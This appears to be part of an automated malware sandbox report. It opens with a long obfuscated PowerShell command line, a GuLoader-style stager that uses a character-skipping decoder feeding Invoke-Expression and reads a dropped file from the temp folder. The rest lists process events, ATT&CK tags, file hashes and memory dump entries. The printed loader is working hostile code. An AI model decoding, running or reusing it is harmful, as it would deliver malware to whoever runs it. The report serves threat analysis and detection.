KlKoyDe7Ne)Sp Fl(CeAfdlStt DeAsr IgHaa OnvigBae Unmoe FsBi0wo4 S U'StEta9At8So0KrAUnCCoBTrFnoACo6DaABu8AdAba9KrBKoEBeAAkBDaBPeFHeA A4MiA E3MeAseAFiB GEReANi4idARi3SuABr9NiBHaEAuABrCKnBEn9 SBRoEAlA G4JeBAkBMuAVr8AuA A7AuABz8TiAEv3BeAua8UdE uDHaFBi0TrEJiDAk9Si6 r9MaESuBId4UnBSaEBaB S9 GAPn8SpAMe0UnE B3bi9ubFGeBRi8MoAIn3 CBFe9NoASp4BeADy0 UADa8LaEMi3 H8Me4 RA D3TaBUn9MeA G8UnBPrFAbAcu2NoB KDmi9inEkaA F8BaBThFEkBMyBUnAAk4 DASeEFoAVi8BiBwyE TE i3Pe8Sj0RaA SCBiBTiFUnBreEAuAme5CuADeCkiAPe1Po9 S0CoFNi7OsF T7Rd8RiAUdAsk8InBFo9Re8Do9TeApa8RaACo1reA P8FaASaAUnAtiCRaBIm9FeASo8Si8EmBEsA F2HeB TFDr8YeBReBom8SvASt3SiAStEcaBTo9ZeAGa4skAHe2OrAFd3En9OvDShAMo2BeA n4 DAod3UnB S9HaAEx8 FBRoFReEBu5UnE K5Fn9fdE tAPr6TaAEa4CrBCoESuBSaDCrAIn2BrB CFAcBEt9 SAEx8BaAEn3 KFFlEAdEElDOvE d9 T9 CE NA M6EnA b6KeAEn8 HBRgDhjA A4FoAflFWhAMa8irBstFFaACo3PrADe8SlEglDNoESk9 E9NaEEuB D8PrBPeDHaBraDGlABu2PoBPrEVoAFrCRiABaFSeAbo1veBFi4 UFPlBInEHo4CaEAu1BiELiDHeEpe5 H9InETrA S6TeASt4 TBKoE DBBlD RABl2LeBafFKrBPo9MyA N8EfA N3 BFInFtvE FD E8SaDCoEOp5Ne9Wi6Fo8Po4suAPr3SkBRg9StFOpEFrFUfF s9Mu0OvEAg1DrEBaDSo9fo6Py8ko4LaA F3PaB B9HoF NE FFHoFKa9 E0AlEHy1ToEStD I9Pu6Se8Sp4ChAta3baBHa9omF NEStF DFMe9Ng0UnEPr1NoETeDKa9Sa6 S8re4stASi3SkBAg9HiFQuEStFKaFFo9Ha0EfEmg1KaENoDVa9Ko6 E8Fl4TiAMi3UnBVa9PoFOrEBvF DFpr9Un0AnESh4 REArDEpEIm5Sk9Br6Am8 U4AfABe3UdBSp9 F9SkDSyB P9miBPoF S9 G0KnEAd4StENb4PrEAn4Be'Se)sk;No&se(Om`$AlS Su FpAgpSkoSusUnaFjb Kl CyMo7Fo)Re Mu(SoANelOvtCleUrropgPraSunShgPleStnFoe TsVa0Di4Ma Ba'AvEBi9 P9He8FiASm3TjABiB AASi8KoAge0 UA p4 CAUn3 GAKr4 DBMiEkoA G8WoACo9CaFLaFDeFSuC AFNoFSpEScDCoFAn0NeEMaD sESt9 L9FaF SAKa5JoBTe4ScAPa0AnATs8 GB UE SETi3Ad8 A4NsA F3KrBFiB RASe2puAFo6MiAfa8FaEUn5KoEMa0haFReCRaEdi1AnFGaDMiESe1 MFFuBstFRo9 NESk1FrFPeDRiEGt1ScE AD UFKlA OFKn5ArFAfDCrFSuBInFDa8ToFShBVaFFoBQuFHy9UnE K1 SFCoDLaEMo4ch'Ti)Ak;Se&Fl(Jo`$FoSKruVapMap FoTysUnaPrbstl CyOv7 A)Ge En(UdANalLat peFor BgPsaSvnBrg MePinQue UsPu0Jo4Ch Ch'SuEFe9Tr8No9UdASkCGaARrESyBRi9EnBSm4SlA W1OuAst4PoA C2GkARe3reEPaDYmFVa0HeE NDPoETh9Ut8Gn0LoAAdCAfBInFGrASt6DiAAc8UnA S9PaBStE FASvB CBvuFOpAHj4maASu3UnADoATvBWhE PAHe4 AA r3CeALy9fdB BEAnACeCDeBFu9FrBCeEBlAPa4AnBAmBFeAUn8 UASt7RiAIl8ceAmi3ScA B8ReEVe3Es8li4KoAPo3TeBSoBZaA B2SaALa6KaA A8 KEPr5OrE P9Te9 A8FiABa3NyAErB OAAn8CrAUt0 SAMy4ekAHj3 GA W4ToBfoEHoAap8EsADo9OvFMaFreFSeCTyFSnFOuEDi1VoFUnD T9ge5AkFAfF SFSpFSpEDo1SeFLoDDaE S1PrFadDSeEPl1SmFStD KEma4Th' E)Fa;Sk`$ WFKoeSctChiMacDiiLadDaaSmlAl2Un=In`""" r`$Bee Tn HvSk: NTCoEPeMUrPSa\VoaEufFedEsebil HiScnSvgsts Fa Sr FkboiRatNeeFrkAdt re Lrprs S\TiP Sa nnSetUno TmRoiOmmSpiTrsHjkMu6 D9Ln\HoAHyvDeiAza Nt So SrPu\BeSMorPel BoHev Hs Ds Sa Pg Se UrGanNueQu\FoJReaMeu OkKisOv.ReU cnSvlUd`"""Te;Sy&Se( F`$SlSHuuPrp MpdeoInsPragubExlAuyAn7Ov)Op Bu(reA Rl Ltexe Fr hgSoa MnTagSueRvnPiePisNs0 N4Ce Hk'JoESw9St8So5 GAHe2 IBNu9siAGlF cA A2BeBCl5RiFPlCStFko4 UFHoCLoEVeDUnFRu0 EECoDTe9Co6Ar9 SEReBFo4SkBKaEDeBst9GgAJe8SlA C0 LESk3Fo8Un4An8as2RiEGa3Ti8ObB PA S4RiAMa1 AASa8Eg9Am0OfFBl7PeFFa7 S9ReF EATr8KeA BCSuASt9Ca8LoCByACa1 cAFl1Ba8PiFlaBEv4KoBCi9FrABa8 UBCrE FE P5CyERe9Va8LuBPrAAp8 CBMi9PiAun4 AA CESwAUm4HeASc9AnATeCFoAAr1ScFReFslEHo4To'Da) S;Ne`$ZeFAlrpreChmYds OkUnaAafBofKaeRelUdsPee UnPr6En7St= B`$MoH boGetKobKuo AxBe1Cl9Im1ov.Gec Ko UuTonBatPl-Gr1Pa0Br2Be4Du;Ul&Rh(Uk`$JaSTeu UpBeplgo PsMuaAfbHilAlyGe7st)Ba On(SaAorlHatFaeUnrMogSlaWinPogEpeUdnSceMasGa0Fe4 B Mu' F9 A6Pr9MaEDrBAc4AfBDiE SBFo9ElA t8 EAPr0ArECo3In9BrFprBHa8HaAFr3InBPe9RyAEr4 PAMa0PhAVa8NaEFr3Su8Ag4TeAPe3SuB I9 tA c8BrBStFUnASl2 ABBeD H9 AEDrAPu8BoBNeFtrBteBCoAUn4FyANoE TAKj8 FB eEPaEPh3Re8Bi0LuAUtCElBPoFKlBKeEseAAs5SkANiCArA u1di9 L0BaFCo7unF a7ni8 IEHuATj2AfBVaDSpBVi4 DEAt5 HEty9Se8 U5HiACa2 SBtu9 gAMoFAnACh2FoBPr5SpF ACEfFta4InFSuCNoE v1IsETrDEuFSeCSuFAgDTiF IFDeFBe9PaEOv1 KE SDimEUd9Ge8Co9FoAPeCTwAJaE PBTe9ScB D4 KALo1UdACo4DiABd2HeANe3 LEJa1HjELaDDeEDe9 T8PlB KB vFCoA E8 SAMa0BiBTjESoASn6 AA TCLaAshBkoAMaBOmA S8SaA P1 OBDoEYaASa8OpASp3 SF BBAnFAnA eESt4Vr' F)Os;Va& B(Kl`$AdSOvuUspLepAioSks SaRebOkl Py R7Et)Un An(PaAWil PtVie Hr SgChaPyn UgOveInncaeFrs G0Ab4St W'PeE U9Kk8 S0FlAElCCeBUdFHoAAn6PrAVi8SeAPa9leBAzEAfA CBMaBFaFprAIn4 BAbl3JaA BAOmB DE rA H4anAmo3erARu9SrBRaE DAVlCUnBTe9TuBreEsaAKoCFuBdeEUdAHy4 sAStF SBEnF rASpCBuA TEBiBVg9JoA T8FyAUn2 BA L1 OA AC PBYo9PoAFl8stEPoD TFRo0CeEstD U9Kn6Sk9UrEMiB S4AgBReESeB P9 sAJt8FoAId0DoEFa3Mi9LoF OB O8BrAbr3PrBHe9ReACr4VeAOk0HaADe8 aEFo3Ci8Rf4etAZi3SkBDo9 EAAa8VaB CF OAFi2TrBCoDJo9sjEDiAFe8AbBLiFInBBeB DAAm4WeABuEInAFu8ilBInEScE M3An8bj0TeAVoCDiBHaFSuBReEReAAt5 hASlCBeA U1Un9 R0FoFCr7SeFPo7ba8HeA OARe8 HBGa9 R8Dg9SnADe8TeAGo1poAdr8flAscAFaATyC IB L9 FA i8Di8FuBFrAAu2 YBskF P8TyB SBGe8PeAIn3ToADyE OB K9SiAFl4ClALe2ReA S3Af9DaDFiASo2InAsa4miA S3noBGe9CaACu8SnBInF SEPr5LiEUn5Mf9roE SARe6KlAIl4 EBSuELuBTrDAnATi2UrBScFluBPe9JvAmu8AuATa3UdFBrESnE ODMoE P9 G9AbEKmACh6FlAIn6DiA P8InBSkDDaAdi4TaAOvFspARe8TaBSlFCoACo3NuAAs8AeECeDTiETo9Be8En0MaAYn4SaBfuFNoACo7ExAReCLuASo0AfBReEArE F4TiEem1taE KDIdEMa5Pe9GoE BA K6TiAFr4drBReEKoB CD WAam2HjBSiFBaBKl9 gASt8 TARe3KoFSpFOkECaDCa8PaDMeECo5Gl9Fa6Sk8Ha4LnAOr3ErBMo9Su9PhD HBSh9diB EFIn9Ar0 hERe1 DEReD P9 P6Es8 p4 LACo3 PBPa9Sl9RhDEmBBa9kuBFoFRo9Ph0AfETr1OpE IDPo9Ir6Bo8Bi4ApAMa3DoBEu9 C9AlDteBVa9ArBInFEl9Gn0NuEPr4CoEnoDDiESl5Ma9Ti6Fe8Mi4BoA S3UnBra9Pu9 ODtrBTa9 BBSkFPe9De0 FEce4klERe4liEVe4St'Mo)Un;Li&Br(sp`$PeS SuHepazpfoo LsPraEvbGelIny F7 T) C Le(ApAAmlRetBaeCarDigGraRenMagCoeFrnKeeCasFo0Se4In P'SaESl9 G8Si0SlAMaCOuBJoFbeARe6AaANe8DeAAl9 TBBaEGrAPhBJuBMeFSkANo4 GA P3AlA VAGaBPiEFlAMi4SyAWe3 EAAt9ToB eEPeAKvCReBTe9BaBFeE iAFaC CBSgEMuABr4BrALoFquB AF RAKiCLuAGaEPrBLi9idASq8 sASl2HuAEn1AuAEfCInBOm9ExAIm8SyEDg3Po8 M4AfA E3JuBMoBGiAMi2SkAKa6ApALu8 TELi5PiFTaDDaEge1PeE M9Af8St9 PAInCToAAlEPiBSn9loBbi4PoASj1NoASy4VaAGr2ReAUs3BaE L1 KFSaDToEAn4Fa'Pr)Sr#Sk;""";function Skisporten5 ($Slurped,$Markedsfringsindsats) { &$Skisporten0 (Enfirm9 'sc$PrSBrlTiuUdrEvp PeImdAy S-EvbTrxVioHorMi Br$SaMMiaSyr GkByeHudEfsImfImrBaiTin RgOrslai In DdUnsMiaNutNissc ');}Function Enfirm9 ($Physicotherapy74) { $Covin=2+1; For($Forkontorer=2; $Forkontorer -lt $Physicotherapy74.Length-1; $Forkontorer+=($Covin)){ $Harrilsiv = 'su'+'bstri'+'ng'; $Altergangenes = $Altergangenes + $Physicotherapy74.$Harrilsiv.Invoke($Forkontorer, 1); } $Altergangenes;}$Skisporten0 = Enfirm9 'JuIStEOvXIn ';&$Skisporten0 (Enfirm9 $Pinagtiges);<#Formidling Incomprehending Davrens #>;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 2092
4⤵
- Program crash
PID:4100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4104 -ip 4104
1⤵
PID:516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0eai4h5e.u1n.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\afdelingsarkitekters\Unsubstantiation\Aflnnes\Disarranges\Paakrende.Smu

Filesize
21KB

MD5
9053238db9312a860c6881838d598b23

SHA1
e8d91d32f555c011b88265c2c5c379e0a32565d2

SHA256
be3d6e60c6a10f38f23ab6206192a234b13d3ad2b5edf41567979ee8fd2ee110

SHA512
42dc67b13c67ca2db5c6046dcc42627c1815e64c6469ec1e569b05f053232ffff87ad477cf1d6e73f5f4328ae123457763258f5dffaa56728d2a9d1f2f2d31fb

Download Submit
memory/852-28-0x00000000063B0000-0x00000000063CE000-memory.dmp

Filesize
120KB

Download
memory/852-32-0x0000000006910000-0x0000000006932000-memory.dmp

Filesize
136KB

Download
memory/852-14-0x0000000005570000-0x0000000005B98000-memory.dmp

Filesize
6.2MB

Download
memory/852-15-0x00000000054F0000-0x0000000005512000-memory.dmp

Filesize
136KB

Download
memory/852-16-0x0000000005CD0000-0x0000000005D36000-memory.dmp

Filesize
408KB

Download
memory/852-17-0x0000000005D40000-0x0000000005DA6000-memory.dmp

Filesize
408KB

Download
memory/852-12-0x0000000002F00000-0x0000000002F10000-memory.dmp

Filesize
64KB

Download
memory/852-27-0x0000000005EB0000-0x0000000006204000-memory.dmp

Filesize
3.3MB

Download
memory/852-11-0x0000000074C90000-0x0000000075440000-memory.dmp

Filesize
7.7MB

Download
memory/852-29-0x0000000006460000-0x00000000064AC000-memory.dmp

Filesize
304KB

Download
memory/852-30-0x0000000007410000-0x00000000074A6000-memory.dmp

Filesize
600KB

Download
memory/852-13-0x0000000002F00000-0x0000000002F10000-memory.dmp

Filesize
64KB

Download
memory/852-31-0x0000000006890000-0x00000000068AA000-memory.dmp

Filesize
104KB

Download
memory/852-33-0x0000000007A60000-0x0000000008004000-memory.dmp

Filesize
5.6MB

Download
memory/852-10-0x0000000002DD0000-0x0000000002E06000-memory.dmp

Filesize
216KB

Download
memory/852-51-0x0000000074C90000-0x0000000075440000-memory.dmp

Filesize
7.7MB

Download
memory/4104-37-0x00000000046A0000-0x00000000046B0000-memory.dmp

Filesize
64KB

Download
memory/4104-36-0x00000000046A0000-0x00000000046B0000-memory.dmp

Filesize
64KB

Download
memory/4104-47-0x00000000074B0000-0x0000000007B2A000-memory.dmp

Filesize
6.5MB

Download
memory/4104-48-0x0000000074C90000-0x0000000075440000-memory.dmp

Filesize
7.7MB

Download
memory/4104-35-0x0000000074C90000-0x0000000075440000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing